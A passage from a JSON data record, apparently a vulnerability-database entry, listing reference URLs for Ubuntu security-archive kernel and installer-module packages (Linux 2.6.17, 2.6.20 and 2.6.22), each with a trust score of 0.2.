        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.22/linux-image-2.6.22-14-rt_2.6.22-14.51_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-2.6.20-16-lowlatency_2.6.20-16.34_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-sparc64_2.6.17.1-12.43_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.43_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-server_2.6.20-16.34_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-sparc64-smp_2.6.20-16.34_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-sparc64_2.6.17.1-12.43_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-386_2.6.17.1-12.43_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-16.34.diff.gz"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-14-server_2.6.22-14.51_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-386_2.6.22-14.51_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.34_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/acpi-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-sparc64-smp_2.6.17.1-12.43_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-source-2.6.22_2.6.22-14.51_all.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-server_2.6.22-14.51_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-14-virtual_2.6.22-14.51_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server_2.6.20-16.34_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-sparc64_2.6.22-14.51_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.22/linux-image-2.6.22-14-rt_2.6.22-14.51_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-generic_2.6.20-16.34_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-kernel-devel_2.6.22-14.51_all.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc-smp_2.6.17.1-12.43_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-sparc64_2.6.20-16.34_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.43_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-powerpc64-smp_2.6.22-14.51_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-powerpc_2.6.22-14.51_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-powerpc_2.6.20-16.34_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
